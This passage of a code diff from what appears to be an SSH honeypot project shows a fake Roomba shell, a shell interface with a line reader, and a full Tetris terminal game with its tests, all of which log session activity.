ALL SYSTEMS NOMINAL`
return commandResult{output: diag}
}
func (s *roombaState) cmdAlerts() commandResult {
var alerts []string
if s.dustbin >= 60 {
alerts = append(alerts, fmt.Sprintf("WARNING: Dustbin %d%% full - consider emptying", s.dustbin))
}
alerts = append(alerts,
"WARNING: Side brush replacement due in 12 hours",
"INFO: Unidentified sticky substance detected in Kitchen",
"INFO: Cat frequently blocking cleaning path in Cat's Room",
"INFO: Firmware update available: v4.4.0-beta",
"INFO: Filter replacement recommended in 14 days",
)
var b strings.Builder
b.WriteString("=== Active Alerts ===\n")
for _, a := range alerts {
b.WriteString(a + "\n")
}
b.WriteString(fmt.Sprintf("\n%d alert(s) active", len(alerts)))
return commandResult{output: b.String()}
}
func (s *roombaState) cmdReboot() commandResult {
reboot := `RoombaOS is rebooting...
Stopping navigation engine..... done
Saving room map data........... done
Flushing cleaning logs......... done
Disconnecting from WiFi........ done
Rebooting now. Goodbye!`
return commandResult{output: reboot, exit: true}
}
func capitalizeFirst(s string) string {
if s == "" {
return s
}
return strings.ToUpper(s[:1]) + s[1:]
}
func formatDuration(d time.Duration) string {
hours := int(d.Hours())
minutes := int(d.Minutes()) % 60
if hours >= 24 {
days := hours / 24
hours %= 24
return fmt.Sprintf("%dd %dh", days, hours)
}
if hours > 0 {
return fmt.Sprintf("%dh %dm", hours, minutes)
}
return fmt.Sprintf("%dm", minutes)
}

91
internal/shell/shell.go Normal file
View File

@@ -0,0 +1,91 @@
package shell
import (
"context"
"fmt"
"io"
"code.t-juice.club/torjus/oubliette/internal/storage"
)
// Shell is the interface that all honeypot shell implementations must satisfy.
type Shell interface {
Name() string
Description() string
Handle(ctx context.Context, sess *SessionContext, rw io.ReadWriteCloser) error
}
// SessionContext carries metadata about the current SSH session.
type SessionContext struct {
SessionID string
Username string
RemoteAddr string
ClientVersion string
Store storage.Store
ShellConfig map[string]any
CommonConfig ShellCommonConfig
OnCommand func(shell string) // called when a command is executed; may be nil
}
// ShellCommonConfig holds settings shared across all shell types.
type ShellCommonConfig struct {
Hostname string
Banner string
FakeUser string // override username in prompt; empty = use authenticated user
}
// ReadLine reads a line of input byte-by-byte, handling backspace, Ctrl+C, and Ctrl+D.
func ReadLine(ctx context.Context, rw io.ReadWriter) (string, error) {
var buf []byte
b := make([]byte, 1)
for {
select {
case <-ctx.Done():
return "", ctx.Err()
default:
}
n, err := rw.Read(b)
if err != nil {
return "", err
}
if n == 0 {
continue
}
ch := b[0]
switch {
case ch == '\r' || ch == '\n':
fmt.Fprint(rw, "\r\n")
return string(buf), nil
case ch == 4: // Ctrl+D
if len(buf) == 0 {
return "", io.EOF
}
case ch == 3: // Ctrl+C
fmt.Fprint(rw, "^C\r\n")
return "", nil
case ch == 127 || ch == 8: // DEL or Backspace
if len(buf) > 0 {
buf = buf[:len(buf)-1]
fmt.Fprint(rw, "\b \b")
}
case ch == 27: // ESC - start of escape sequence
// Read and discard the rest of the escape sequence.
// Most are 3 bytes: ESC [ X (arrow keys, etc.)
next := make([]byte, 1)
if n, _ := rw.Read(next); n > 0 && next[0] == '[' {
rw.Read(next) // read the final byte
}
case ch >= 32 && ch < 127: // printable ASCII
buf = append(buf, ch)
rw.Write([]byte{ch})
}
}
}

View File

@@ -0,0 +1,101 @@
package tetris
import "github.com/charmbracelet/lipgloss"
// pieceType identifies a tetromino (06).
type pieceType int
const (
pieceI pieceType = iota
pieceO
pieceT
pieceS
pieceZ
pieceJ
pieceL
)
const numPieceTypes = 7
// Standard Tetris colors.
var pieceColors = [numPieceTypes]lipgloss.Color{
lipgloss.Color("#00FFFF"), // I — cyan
lipgloss.Color("#FFFF00"), // O — yellow
lipgloss.Color("#AA00FF"), // T — purple
lipgloss.Color("#00FF00"), // S — green
lipgloss.Color("#FF0000"), // Z — red
lipgloss.Color("#0000FF"), // J — blue
lipgloss.Color("#FF8800"), // L — orange
}
// Each piece has 4 rotations, each rotation is a list of (row, col) offsets
// relative to the piece origin.
type rotation [4][2]int
var pieces = [numPieceTypes][4]rotation{
// I
{
{[2]int{0, 0}, [2]int{0, 1}, [2]int{0, 2}, [2]int{0, 3}},
{[2]int{0, 0}, [2]int{1, 0}, [2]int{2, 0}, [2]int{3, 0}},
{[2]int{0, 0}, [2]int{0, 1}, [2]int{0, 2}, [2]int{0, 3}},
{[2]int{0, 0}, [2]int{1, 0}, [2]int{2, 0}, [2]int{3, 0}},
},
// O
{
{[2]int{0, 0}, [2]int{0, 1}, [2]int{1, 0}, [2]int{1, 1}},
{[2]int{0, 0}, [2]int{0, 1}, [2]int{1, 0}, [2]int{1, 1}},
{[2]int{0, 0}, [2]int{0, 1}, [2]int{1, 0}, [2]int{1, 1}},
{[2]int{0, 0}, [2]int{0, 1}, [2]int{1, 0}, [2]int{1, 1}},
},
// T
{
{[2]int{0, 0}, [2]int{0, 1}, [2]int{0, 2}, [2]int{1, 1}},
{[2]int{0, 0}, [2]int{1, 0}, [2]int{2, 0}, [2]int{1, 1}},
{[2]int{0, 1}, [2]int{1, 0}, [2]int{1, 1}, [2]int{1, 2}},
{[2]int{0, 1}, [2]int{1, 0}, [2]int{1, 1}, [2]int{2, 1}},
},
// S
{
{[2]int{0, 1}, [2]int{0, 2}, [2]int{1, 0}, [2]int{1, 1}},
{[2]int{0, 0}, [2]int{1, 0}, [2]int{1, 1}, [2]int{2, 1}},
{[2]int{0, 1}, [2]int{0, 2}, [2]int{1, 0}, [2]int{1, 1}},
{[2]int{0, 0}, [2]int{1, 0}, [2]int{1, 1}, [2]int{2, 1}},
},
// Z
{
{[2]int{0, 0}, [2]int{0, 1}, [2]int{1, 1}, [2]int{1, 2}},
{[2]int{0, 1}, [2]int{1, 0}, [2]int{1, 1}, [2]int{2, 0}},
{[2]int{0, 0}, [2]int{0, 1}, [2]int{1, 1}, [2]int{1, 2}},
{[2]int{0, 1}, [2]int{1, 0}, [2]int{1, 1}, [2]int{2, 0}},
},
// J
{
{[2]int{0, 0}, [2]int{1, 0}, [2]int{1, 1}, [2]int{1, 2}},
{[2]int{0, 0}, [2]int{0, 1}, [2]int{1, 0}, [2]int{2, 0}},
{[2]int{0, 0}, [2]int{0, 1}, [2]int{0, 2}, [2]int{1, 2}},
{[2]int{0, 0}, [2]int{1, 0}, [2]int{2, 0}, [2]int{2, 1}},
},
// L
{
{[2]int{0, 2}, [2]int{1, 0}, [2]int{1, 1}, [2]int{1, 2}},
{[2]int{0, 0}, [2]int{1, 0}, [2]int{2, 0}, [2]int{2, 1}},
{[2]int{0, 0}, [2]int{0, 1}, [2]int{0, 2}, [2]int{1, 0}},
{[2]int{0, 0}, [2]int{0, 1}, [2]int{1, 1}, [2]int{2, 1}},
},
}
// spawnCol returns the starting column for a piece, centering it on the board.
func spawnCol(pt pieceType, rot int) int {
shape := pieces[pt][rot]
minC, maxC := shape[0][1], shape[0][1]
for _, off := range shape {
if off[1] < minC {
minC = off[1]
}
if off[1] > maxC {
maxC = off[1]
}
}
width := maxC - minC + 1
return (boardCols - width) / 2
}

View File

@@ -0,0 +1,210 @@
package tetris
import "math/rand/v2"
const (
boardRows = 20
boardCols = 10
)
// cell represents a single board cell. Zero value is empty.
type cell struct {
filled bool
piece pieceType // which piece type filled this cell (for color)
}
// gameState holds all mutable state for a Tetris game.
type gameState struct {
board [boardRows][boardCols]cell
current pieceType
currentRot int
currentRow int
currentCol int
next pieceType
score int
level int
lines int
gameOver bool
}
// newGame creates a new game state, optionally starting at a given level.
func newGame(startLevel int) *gameState {
g := &gameState{
level: startLevel,
next: pieceType(rand.IntN(numPieceTypes)),
}
g.spawnPiece()
return g
}
// spawnPiece pulls the next piece and generates a new next.
func (g *gameState) spawnPiece() {
g.current = g.next
g.next = pieceType(rand.IntN(numPieceTypes))
g.currentRot = 0
g.currentRow = 0
g.currentCol = spawnCol(g.current, 0)
if !g.canPlace(g.current, g.currentRot, g.currentRow, g.currentCol) {
g.gameOver = true
}
}
// canPlace checks whether the piece fits at the given position.
func (g *gameState) canPlace(pt pieceType, rot, row, col int) bool {
shape := pieces[pt][rot]
for _, off := range shape {
r, c := row+off[0], col+off[1]
if r < 0 || r >= boardRows || c < 0 || c >= boardCols {
return false
}
if g.board[r][c].filled {
return false
}
}
return true
}
// moveLeft moves the current piece left if possible.
func (g *gameState) moveLeft() bool {
if g.canPlace(g.current, g.currentRot, g.currentRow, g.currentCol-1) {
g.currentCol--
return true
}
return false
}
// moveRight moves the current piece right if possible.
func (g *gameState) moveRight() bool {
if g.canPlace(g.current, g.currentRot, g.currentRow, g.currentCol+1) {
g.currentCol++
return true
}
return false
}
// moveDown moves the current piece down one row. Returns false if it cannot.
func (g *gameState) moveDown() bool {
if g.canPlace(g.current, g.currentRot, g.currentRow+1, g.currentCol) {
g.currentRow++
return true
}
return false
}
// rotate rotates the current piece clockwise with wall kick attempts.
func (g *gameState) rotate() bool {
newRot := (g.currentRot + 1) % 4
// Try in-place first.
if g.canPlace(g.current, newRot, g.currentRow, g.currentCol) {
g.currentRot = newRot
return true
}
// Wall kick: try +-1 column offset.
for _, offset := range []int{-1, 1} {
if g.canPlace(g.current, newRot, g.currentRow, g.currentCol+offset) {
g.currentRot = newRot
g.currentCol += offset
return true
}
}
// I piece: try +-2.
if g.current == pieceI {
for _, offset := range []int{-2, 2} {
if g.canPlace(g.current, newRot, g.currentRow, g.currentCol+offset) {
g.currentRot = newRot
g.currentCol += offset
return true
}
}
}
return false
}
// ghostRow returns the row where the piece would land.
func (g *gameState) ghostRow() int {
row := g.currentRow
for g.canPlace(g.current, g.currentRot, row+1, g.currentCol) {
row++
}
return row
}
// hardDrop drops the piece to the bottom and returns the number of rows dropped.
func (g *gameState) hardDrop() int {
ghost := g.ghostRow()
dropped := ghost - g.currentRow
g.currentRow = ghost
return dropped
}
// lockPiece writes the current piece into the board.
func (g *gameState) lockPiece() {
shape := pieces[g.current][g.currentRot]
for _, off := range shape {
r, c := g.currentRow+off[0], g.currentCol+off[1]
if r >= 0 && r < boardRows && c >= 0 && c < boardCols {
g.board[r][c] = cell{filled: true, piece: g.current}
}
}
}
// clearLines removes completed rows and returns how many were cleared.
func (g *gameState) clearLines() int {
cleared := 0
for r := boardRows - 1; r >= 0; r-- {
full := true
for c := range boardCols {
if !g.board[r][c].filled {
full = false
break
}
}
if full {
cleared++
// Shift everything above down.
for rr := r; rr > 0; rr-- {
g.board[rr] = g.board[rr-1]
}
g.board[0] = [boardCols]cell{}
r++ // re-check this row since we shifted
}
}
return cleared
}
// NES-style scoring multipliers per lines cleared.
var lineScoreMultipliers = [5]int{0, 40, 100, 300, 1200}
// addScore updates score, lines, and level after clearing rows.
func (g *gameState) addScore(linesCleared int) {
if linesCleared > 0 && linesCleared <= 4 {
g.score += lineScoreMultipliers[linesCleared] * (g.level + 1)
}
g.lines += linesCleared
// Level up every 10 lines.
newLevel := g.lines / 10
if newLevel > g.level {
g.level = newLevel
}
}
// afterLock locks the piece, clears lines, scores, and spawns the next piece.
// Returns the number of lines cleared.
func (g *gameState) afterLock() int {
g.lockPiece()
cleared := g.clearLines()
g.addScore(cleared)
g.spawnPiece()
return cleared
}
// tickInterval returns the gravity interval in milliseconds for the current level.
func tickInterval(level int) int {
return max(800-level*60, 100)
}

View File

@@ -0,0 +1,331 @@
package tetris
import (
"context"
"fmt"
"strings"
"time"
tea "github.com/charmbracelet/bubbletea"
"code.t-juice.club/torjus/oubliette/internal/shell"
)
type screen int
const (
screenTitle screen = iota
screenGame
screenGameOver
)
type tickMsg time.Time
type lockMsg time.Time
const lockDelay = 500 * time.Millisecond
type model struct {
sess *shell.SessionContext
difficulty string
screen screen
game *gameState
quitting bool
height int
keypresses int
locking bool // true when piece has landed and lock delay is active
}
func newModel(sess *shell.SessionContext, difficulty string) *model {
return &model{
sess: sess,
difficulty: difficulty,
screen: screenTitle,
}
}
func (m *model) Init() tea.Cmd {
return nil
}
func (m *model) Update(msg tea.Msg) (tea.Model, tea.Cmd) {
if m.quitting {
return m, tea.Quit
}
switch msg := msg.(type) {
case tea.WindowSizeMsg:
m.height = msg.Height
return m, nil
case tea.KeyMsg:
m.keypresses++
if msg.Type == tea.KeyCtrlC {
m.quitting = true
return m, tea.Batch(
logAction(m.sess, fmt.Sprintf("QUIT score=%d level=%d lines=%d keys=%d", m.gameScore(), m.gameLevel(), m.gameLines(), m.keypresses), "SESSION ENDED"),
tea.Quit,
)
}
}
switch m.screen {
case screenTitle:
return m.updateTitle(msg)
case screenGame:
return m.updateGame(msg)
case screenGameOver:
return m.updateGameOver(msg)
}
return m, nil
}
func (m *model) View() string {
var content string
switch m.screen {
case screenTitle:
content = m.titleView()
case screenGame:
content = gameView(m.game)
case screenGameOver:
content = m.gameOverView()
}
return gameFrame(content, m.height)
}
// --- Title screen ---
func (m *model) titleView() string {
var b strings.Builder
b.WriteString("\n")
b.WriteString(titleStyle.Render(" ████████╗███████╗████████╗██████╗ ██╗███████╗"))
b.WriteString("\n")
b.WriteString(titleStyle.Render(" ╚══██╔══╝██╔════╝╚══██╔══╝██╔══██╗██║██╔════╝"))
b.WriteString("\n")
b.WriteString(titleStyle.Render(" ██║ █████╗ ██║ ██████╔╝██║███████╗"))
b.WriteString("\n")
b.WriteString(titleStyle.Render(" ██║ ██╔══╝ ██║ ██╔══██╗██║╚════██║"))
b.WriteString("\n")
b.WriteString(titleStyle.Render(" ██║ ███████╗ ██║ ██║ ██║██║███████║"))
b.WriteString("\n")
b.WriteString(titleStyle.Render(" ╚═╝ ╚══════╝ ╚═╝ ╚═╝ ╚═╝╚═╝╚══════╝"))
b.WriteString("\n\n")
b.WriteString(baseStyle.Render(" Press any key to start"))
b.WriteString("\n")
return b.String()
}
func (m *model) updateTitle(msg tea.Msg) (tea.Model, tea.Cmd) {
if _, ok := msg.(tea.KeyMsg); ok {
m.screen = screenGame
var startLevel int
if m.difficulty == "hard" {
startLevel = 5
}
m.game = newGame(startLevel)
return m, tea.Batch(
tea.ClearScreen,
m.scheduleTick(),
logAction(m.sess, "GAME START", fmt.Sprintf("difficulty=%s", m.difficulty)),
)
}
return m, nil
}
// --- Game screen ---
func (m *model) scheduleTick() tea.Cmd {
ms := tickInterval(m.game.level)
if m.difficulty == "easy" {
ms = max(1000-m.game.level*60, 150)
}
return tea.Tick(time.Duration(ms)*time.Millisecond, func(t time.Time) tea.Msg {
return tickMsg(t)
})
}
func (m *model) scheduleLock() tea.Cmd {
return tea.Tick(lockDelay, func(t time.Time) tea.Msg {
return lockMsg(t)
})
}
// performLock locks the piece, clears lines, and returns commands for logging
// and scheduling the next tick. Returns nil if game over (goToGameOver is
// included in the returned batch).
func (m *model) performLock() tea.Cmd {
m.locking = false
cleared := m.game.afterLock()
if m.game.gameOver {
return tea.Batch(
logAction(m.sess, fmt.Sprintf("GAME OVER score=%d level=%d lines=%d keys=%d", m.game.score, m.game.level, m.game.lines, m.keypresses), "GAME OVER"),
m.goToGameOver(),
)
}
var cmds []tea.Cmd
cmds = append(cmds, m.scheduleTick())
if cleared > 0 {
cmds = append(cmds, logAction(m.sess, fmt.Sprintf("LINES %d score=%d", cleared, m.game.score), fmt.Sprintf("total=%d", m.game.lines)))
prevLevel := (m.game.lines - cleared) / 10
if m.game.level > prevLevel {
cmds = append(cmds, logAction(m.sess, fmt.Sprintf("LEVEL UP %d", m.game.level), fmt.Sprintf("score=%d", m.game.score)))
}
}
return tea.Batch(cmds...)
}
func (m *model) updateGame(msg tea.Msg) (tea.Model, tea.Cmd) {
switch msg := msg.(type) {
case lockMsg:
if m.game.gameOver || !m.locking {
return m, nil
}
// Lock delay expired — lock the piece now.
return m, m.performLock()
case tickMsg:
if m.game.gameOver || m.locking {
return m, nil
}
if !m.game.moveDown() {
// Piece landed — start lock delay instead of locking immediately.
m.locking = true
return m, m.scheduleLock()
}
return m, m.scheduleTick()
case tea.KeyMsg:
if m.game.gameOver {
return m, nil
}
switch msg.String() {
case "left":
m.game.moveLeft()
// If piece can now drop further, cancel lock delay.
if m.locking && m.game.canPlace(m.game.current, m.game.currentRot, m.game.currentRow+1, m.game.currentCol) {
m.locking = false
}
case "right":
m.game.moveRight()
if m.locking && m.game.canPlace(m.game.current, m.game.currentRot, m.game.currentRow+1, m.game.currentCol) {
m.locking = false
}
case "down":
if m.game.moveDown() {
m.game.score++ // soft drop bonus
if m.locking {
m.locking = false
}
}
case "up", "z":
m.game.rotate()
if m.locking && m.game.canPlace(m.game.current, m.game.currentRot, m.game.currentRow+1, m.game.currentCol) {
m.locking = false
}
case " ":
m.locking = false
dropped := m.game.hardDrop()
m.game.score += dropped * 2
return m, m.performLock()
case "q":
m.quitting = true
return m, tea.Batch(
logAction(m.sess, fmt.Sprintf("QUIT score=%d level=%d lines=%d keys=%d", m.game.score, m.game.level, m.game.lines, m.keypresses), "PLAYER QUIT"),
tea.Quit,
)
}
return m, nil
}
return m, nil
}
// --- Game over screen ---
func (m *model) goToGameOver() tea.Cmd {
m.screen = screenGameOver
return tea.ClearScreen
}
func (m *model) gameOverView() string {
var b strings.Builder
b.WriteString("\n")
b.WriteString(titleStyle.Render(" GAME OVER"))
b.WriteString("\n\n")
b.WriteString(baseStyle.Render(fmt.Sprintf(" Score: %s", formatScore(m.game.score))))
b.WriteString("\n")
b.WriteString(baseStyle.Render(fmt.Sprintf(" Level: %d", m.game.level)))
b.WriteString("\n")
b.WriteString(baseStyle.Render(fmt.Sprintf(" Lines: %d", m.game.lines)))
b.WriteString("\n\n")
b.WriteString(dimStyle.Render(" R - Play again"))
b.WriteString("\n")
b.WriteString(dimStyle.Render(" Q - Quit"))
b.WriteString("\n")
return b.String()
}
func (m *model) updateGameOver(msg tea.Msg) (tea.Model, tea.Cmd) {
if keyMsg, ok := msg.(tea.KeyMsg); ok {
switch keyMsg.String() {
case "r":
startLevel := 0
if m.difficulty == "hard" {
startLevel = 5
}
m.game = newGame(startLevel)
m.screen = screenGame
m.keypresses = 0
return m, tea.Batch(
tea.ClearScreen,
m.scheduleTick(),
logAction(m.sess, "RESTART", fmt.Sprintf("difficulty=%s", m.difficulty)),
)
case "q":
m.quitting = true
return m, tea.Batch(
logAction(m.sess, fmt.Sprintf("QUIT score=%d level=%d lines=%d keys=%d", m.game.score, m.game.level, m.game.lines, m.keypresses), "PLAYER QUIT"),
tea.Quit,
)
}
}
return m, nil
}
// Helper methods for safe access when game may be nil.
func (m *model) gameScore() int {
if m.game != nil {
return m.game.score
}
return 0
}
func (m *model) gameLevel() int {
if m.game != nil {
return m.game.level
}
return 0
}
func (m *model) gameLines() int {
if m.game != nil {
return m.game.lines
}
return 0
}
// logAction returns a tea.Cmd that logs an action to the session store.
func logAction(sess *shell.SessionContext, input, output string) tea.Cmd {
return func() tea.Msg {
if sess.Store != nil {
ctx, cancel := context.WithTimeout(context.Background(), 2*time.Second)
defer cancel()
_ = sess.Store.AppendSessionLog(ctx, sess.SessionID, input, output)
}
if sess.OnCommand != nil {
sess.OnCommand("tetris")
}
return nil
}
}

View File

@@ -0,0 +1,286 @@
package tetris
import (
"fmt"
"strings"
"github.com/charmbracelet/lipgloss"
)
const termWidth = 80
var (
colorWhite = lipgloss.Color("#FFFFFF")
colorDim = lipgloss.Color("#555555")
colorBlack = lipgloss.Color("#000000")
colorGhost = lipgloss.Color("#333333")
)
var (
baseStyle = lipgloss.NewStyle().
Foreground(colorWhite).
Background(colorBlack)
dimStyle = lipgloss.NewStyle().
Foreground(colorDim).
Background(colorBlack)
titleStyle = lipgloss.NewStyle().
Foreground(lipgloss.Color("#00FFFF")).
Background(colorBlack).
Bold(true)
sidebarLabelStyle = lipgloss.NewStyle().
Foreground(colorDim).
Background(colorBlack)
sidebarValueStyle = lipgloss.NewStyle().
Foreground(colorWhite).
Background(colorBlack).
Bold(true)
)
// cellStyle returns a style for a filled cell of a given piece type.
func cellStyle(pt pieceType) lipgloss.Style {
return lipgloss.NewStyle().
Foreground(pieceColors[pt]).
Background(colorBlack)
}
// ghostStyle returns a dimmed style for the ghost piece.
func ghostCellStyle() lipgloss.Style {
return lipgloss.NewStyle().
Foreground(colorGhost).
Background(colorBlack)
}
// renderBoard renders the board, current piece, and ghost piece as a string.
func renderBoard(g *gameState) string {
// Build a display grid that includes the current piece and ghost.
type displayCell struct {
filled bool
ghost bool
piece pieceType
}
var grid [boardRows][boardCols]displayCell
// Copy locked cells.
for r := range boardRows {
for c := range boardCols {
if g.board[r][c].filled {
grid[r][c] = displayCell{filled: true, piece: g.board[r][c].piece}
}
}
}
// Ghost piece.
ghostR := g.ghostRow()
if ghostR != g.currentRow {
shape := pieces[g.current][g.currentRot]
for _, off := range shape {
r, c := ghostR+off[0], g.currentCol+off[1]
if r >= 0 && r < boardRows && c >= 0 && c < boardCols && !grid[r][c].filled {
grid[r][c] = displayCell{ghost: true, piece: g.current}
}
}
}
// Current piece.
shape := pieces[g.current][g.currentRot]
for _, off := range shape {
r, c := g.currentRow+off[0], g.currentCol+off[1]
if r >= 0 && r < boardRows && c >= 0 && c < boardCols {
grid[r][c] = displayCell{filled: true, piece: g.current}
}
}
// Render grid.
var b strings.Builder
borderStyle := dimStyle
for _, row := range grid {
b.WriteString(borderStyle.Render("|"))
for _, dc := range row {
switch {
case dc.filled:
b.WriteString(cellStyle(dc.piece).Render("[]"))
case dc.ghost:
b.WriteString(ghostCellStyle().Render("::"))
default:
b.WriteString(baseStyle.Render(" "))
}
}
b.WriteString(borderStyle.Render("|"))
b.WriteString("\n")
}
b.WriteString(borderStyle.Render("+" + strings.Repeat("--", boardCols) + "+"))
return b.String()
}
// renderNextPiece renders the "next piece" preview box.
func renderNextPiece(pt pieceType) string {
shape := pieces[pt][0]
// Determine bounding box.
minR, maxR := shape[0][0], shape[0][0]
minC, maxC := shape[0][1], shape[0][1]
for _, off := range shape {
if off[0] < minR {
minR = off[0]
}
if off[0] > maxR {
maxR = off[0]
}
if off[1] < minC {
minC = off[1]
}
if off[1] > maxC {
maxC = off[1]
}
}
rows := maxR - minR + 1
cols := maxC - minC + 1
// Build a small grid.
grid := make([][]bool, rows)
for i := range grid {
grid[i] = make([]bool, cols)
}
for _, off := range shape {
grid[off[0]-minR][off[1]-minC] = true
}
var b strings.Builder
boxWidth := 8 // chars for the box interior
b.WriteString(dimStyle.Render("+" + strings.Repeat("-", boxWidth) + "+"))
b.WriteString("\n")
for r := range rows {
b.WriteString(dimStyle.Render("|"))
// Center the piece in the box.
pieceWidth := cols * 2
leftPad := (boxWidth - pieceWidth) / 2
rightPad := boxWidth - pieceWidth - leftPad
b.WriteString(baseStyle.Render(strings.Repeat(" ", leftPad)))
for c := range cols {
if grid[r][c] {
b.WriteString(cellStyle(pt).Render("[]"))
} else {
b.WriteString(baseStyle.Render(" "))
}
}
b.WriteString(baseStyle.Render(strings.Repeat(" ", rightPad)))
b.WriteString(dimStyle.Render("|"))
b.WriteString("\n")
}
// Fill remaining rows in the box (max 4 rows for I piece).
for r := rows; r < 2; r++ {
b.WriteString(dimStyle.Render("|"))
b.WriteString(baseStyle.Render(strings.Repeat(" ", boxWidth)))
b.WriteString(dimStyle.Render("|"))
b.WriteString("\n")
}
b.WriteString(dimStyle.Render("+" + strings.Repeat("-", boxWidth) + "+"))
return b.String()
}
// formatScore formats a score with comma separators.
func formatScore(n int) string {
s := fmt.Sprintf("%d", n)
if len(s) <= 3 {
return s
}
var parts []string
for len(s) > 3 {
parts = append([]string{s[len(s)-3:]}, parts...)
s = s[:len(s)-3]
}
parts = append([]string{s}, parts...)
return strings.Join(parts, ",")
}
// gameView combines the board and sidebar into the game screen.
func gameView(g *gameState) string {
boardStr := renderBoard(g)
boardLines := strings.Split(boardStr, "\n")
nextStr := renderNextPiece(g.next)
nextLines := strings.Split(nextStr, "\n")
// Build sidebar lines.
var sidebar []string
sidebar = append(sidebar, sidebarLabelStyle.Render(" NEXT:"))
sidebar = append(sidebar, nextLines...)
sidebar = append(sidebar, "")
sidebar = append(sidebar, sidebarLabelStyle.Render(" SCORE: ")+sidebarValueStyle.Render(formatScore(g.score)))
sidebar = append(sidebar, sidebarLabelStyle.Render(" LEVEL: ")+sidebarValueStyle.Render(fmt.Sprintf("%d", g.level)))
sidebar = append(sidebar, sidebarLabelStyle.Render(" LINES: ")+sidebarValueStyle.Render(fmt.Sprintf("%d", g.lines)))
sidebar = append(sidebar, "")
sidebar = append(sidebar, dimStyle.Render(" Controls:"))
sidebar = append(sidebar, dimStyle.Render(" <- -> Move"))
sidebar = append(sidebar, dimStyle.Render(" Up/Z Rotate"))
sidebar = append(sidebar, dimStyle.Render(" Down Soft drop"))
sidebar = append(sidebar, dimStyle.Render(" Space Hard drop"))
sidebar = append(sidebar, dimStyle.Render(" Q Quit"))
// Combine board and sidebar side by side.
var b strings.Builder
maxLines := max(len(boardLines), len(sidebar))
for i := range maxLines {
boardLine := ""
if i < len(boardLines) {
boardLine = boardLines[i]
}
sidebarLine := ""
if i < len(sidebar) {
sidebarLine = sidebar[i]
}
// Pad board to fixed width (| + 10*2 + | = 22 chars visual).
b.WriteString(boardLine)
b.WriteString(sidebarLine)
b.WriteString("\n")
}
return b.String()
}
// padLine pads a single line to termWidth.
func padLine(line string) string {
w := lipgloss.Width(line)
if w >= termWidth {
return line
}
return line + baseStyle.Render(strings.Repeat(" ", termWidth-w))
}
// padLines pads every line in a multi-line string to termWidth.
func padLines(s string) string {
lines := strings.Split(s, "\n")
for i, line := range lines {
lines[i] = padLine(line)
}
return strings.Join(lines, "\n")
}
// gameFrame wraps content with padding to fill the terminal.
func gameFrame(content string, height int) string {
var b strings.Builder
b.WriteString(content)
// Pad with blank lines to fill terminal height.
if height > 0 {
contentLines := strings.Count(content, "\n") + 1
blankLine := baseStyle.Render(strings.Repeat(" ", termWidth))
for i := contentLines; i < height; i++ {
b.WriteString(blankLine)
b.WriteString("\n")
}
}
return padLines(b.String())
}

View File

@@ -0,0 +1,66 @@
package tetris
import (
"context"
"io"
"time"
tea "github.com/charmbracelet/bubbletea"
"code.t-juice.club/torjus/oubliette/internal/shell"
)
const sessionTimeout = 10 * time.Minute
// TetrisShell is a Tetris game TUI for the honeypot.
type TetrisShell struct{}
// NewTetrisShell returns a new TetrisShell instance.
func NewTetrisShell() *TetrisShell {
return &TetrisShell{}
}
func (t *TetrisShell) Name() string { return "tetris" }
func (t *TetrisShell) Description() string { return "Tetris game TUI" }
func (t *TetrisShell) Handle(ctx context.Context, sess *shell.SessionContext, rw io.ReadWriteCloser) error {
ctx, cancel := context.WithTimeout(ctx, sessionTimeout)
defer cancel()
difficulty := configString(sess.ShellConfig, "difficulty", "normal")
m := newModel(sess, difficulty)
p := tea.NewProgram(m,
tea.WithInput(rw),
tea.WithOutput(rw),
tea.WithAltScreen(),
)
done := make(chan error, 1)
go func() {
_, err := p.Run()
done <- err
}()
select {
case err := <-done:
return err
case <-ctx.Done():
p.Quit()
<-done
return nil
}
}
// configString reads a string from the shell config map with a default.
func configString(cfg map[string]any, key, defaultVal string) string {
if cfg == nil {
return defaultVal
}
if v, ok := cfg[key]; ok {
if s, ok := v.(string); ok && s != "" {
return s
}
}
return defaultVal
}

View File

@@ -0,0 +1,582 @@
package tetris
import (
"context"
"strings"
"testing"
"time"
tea "github.com/charmbracelet/bubbletea"
"code.t-juice.club/torjus/oubliette/internal/shell"
"code.t-juice.club/torjus/oubliette/internal/storage"
)
// newTestModel creates a model with a test session context.
func newTestModel(t *testing.T) (*model, *storage.MemoryStore) {
t.Helper()
store := storage.NewMemoryStore()
sessID, _ := store.CreateSession(context.Background(), "127.0.0.1", "player", "tetris", "")
sess := &shell.SessionContext{
SessionID: sessID,
Username: "player",
Store: store,
}
m := newModel(sess, "normal")
return m, store
}
// sendKey sends a single key message to the model and returns the command.
func sendKey(m *model, key string) tea.Cmd {
var msg tea.KeyMsg
switch key {
case "enter":
msg = tea.KeyMsg{Type: tea.KeyEnter}
case "up":
msg = tea.KeyMsg{Type: tea.KeyUp}
case "down":
msg = tea.KeyMsg{Type: tea.KeyDown}
case "left":
msg = tea.KeyMsg{Type: tea.KeyLeft}
case "right":
msg = tea.KeyMsg{Type: tea.KeyRight}
case "space":
msg = tea.KeyMsg{Type: tea.KeySpace}
case "ctrl+c":
msg = tea.KeyMsg{Type: tea.KeyCtrlC}
default:
if len(key) == 1 {
msg = tea.KeyMsg{Type: tea.KeyRunes, Runes: []rune(key)}
}
}
_, cmd := m.Update(msg)
return cmd
}
// sendTick sends a tick message to the model.
func sendTick(m *model) tea.Cmd {
_, cmd := m.Update(tickMsg(time.Now()))
return cmd
}
// execCmds recursively executes tea.Cmd functions (including batches).
func execCmds(cmd tea.Cmd) {
if cmd == nil {
return
}
msg := cmd()
if batch, ok := msg.(tea.BatchMsg); ok {
for _, c := range batch {
execCmds(c)
}
}
}
func TestTetrisShellName(t *testing.T) {
sh := NewTetrisShell()
if sh.Name() != "tetris" {
t.Errorf("Name() = %q, want %q", sh.Name(), "tetris")
}
if sh.Description() == "" {
t.Error("Description() should not be empty")
}
}
func TestConfigString(t *testing.T) {
cfg := map[string]any{
"difficulty": "hard",
}
if got := configString(cfg, "difficulty", "normal"); got != "hard" {
t.Errorf("configString() = %q, want %q", got, "hard")
}
if got := configString(cfg, "missing", "normal"); got != "normal" {
t.Errorf("configString() = %q, want %q", got, "normal")
}
if got := configString(nil, "difficulty", "normal"); got != "normal" {
t.Errorf("configString(nil) = %q, want %q", got, "normal")
}
}
func TestTitleScreenRenders(t *testing.T) {
m, _ := newTestModel(t)
view := m.View()
if !strings.Contains(view, "████") {
t.Error("title screen should show TETRIS logo")
}
if !strings.Contains(view, "Press any key") {
t.Error("title screen should show 'Press any key'")
}
}
func TestTitleToGame(t *testing.T) {
m, _ := newTestModel(t)
if m.screen != screenTitle {
